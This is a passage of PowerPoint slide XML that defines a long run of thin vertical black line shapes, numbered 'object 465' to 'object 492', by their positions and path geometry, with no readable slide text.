          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="object 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058931" y="4871351"/>
            <a:ext cx="0" cy="819183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="413385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="413225"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="object 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058657" y="4872980"/>
            <a:ext cx="2517" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="412750">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="412402"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="object 467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086783" y="4883705"/>
            <a:ext cx="0" cy="806599"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="407035">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="406984"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="object 468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085718" y="4884509"/>
            <a:ext cx="1258" cy="806599"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="407035">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="406584"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="object 469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114691" y="4870846"/>
            <a:ext cx="0" cy="820443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="414019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="413473"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="object 470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114417" y="4872734"/>
            <a:ext cx="2517" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="412750">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="412526"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="object 471"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142596" y="4868671"/>
            <a:ext cx="0" cy="821702"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="414655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="414578"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="object 472"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7140392" y="4871682"/>
            <a:ext cx="2517" cy="819183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="413385">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="413057"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="object 473"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170448" y="4870299"/>
            <a:ext cx="0" cy="820443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="414019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="413750"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="object 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170176" y="4872445"/>
            <a:ext cx="1258" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="412750">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="412673"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="475" name="object 475"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198354" y="4874580"/>
            <a:ext cx="0" cy="816668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="412114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="411595"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="object 476"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198080" y="4874580"/>
            <a:ext cx="2517" cy="816668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="412114">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="411595"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="object 477"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7226206" y="4862255"/>
            <a:ext cx="0" cy="827993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="417830">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="417809"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="object 478"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225141" y="4863060"/>
            <a:ext cx="1258" cy="827993"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="417830">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="417408"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="object 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254114" y="4854759"/>
            <a:ext cx="0" cy="835543"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="421639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="421592"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="object 480"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7253840" y="4853880"/>
            <a:ext cx="2517" cy="836802"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="422275">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="422041"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="object 481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7281472" y="4865990"/>
            <a:ext cx="0" cy="824218"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="415925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="415931"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="object 482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7279558" y="4864894"/>
            <a:ext cx="2517" cy="825475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="416560">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="416483"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="object 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309324" y="4853129"/>
            <a:ext cx="0" cy="838058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="422910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="422420"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="object 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309052" y="4853129"/>
            <a:ext cx="1258" cy="838058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="422910">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="422420"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="object 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7337230" y="4849397"/>
            <a:ext cx="0" cy="841835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="424814">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="424298"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="object 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7334235" y="4851285"/>
            <a:ext cx="3775" cy="839319"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="423544">
                <a:moveTo>
                  <a:pt x="687" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="687" y="423351"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="object 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7365138" y="4859574"/>
            <a:ext cx="0" cy="831766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="419735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419162"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="object 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7364318" y="4861721"/>
            <a:ext cx="1258" cy="829252"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="418464">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="418085"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="object 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7392990" y="4848312"/>
            <a:ext cx="0" cy="843094"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="425450">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="424850"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="object 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7392716" y="4850736"/>
            <a:ext cx="2517" cy="840577"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="424180">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="423627"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="object 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7420895" y="4852582"/>
            <a:ext cx="0" cy="838058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="422910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="422696"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="object 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7418981" y="4852829"/>
            <a:ext cx="2517" cy="838058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="422910">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
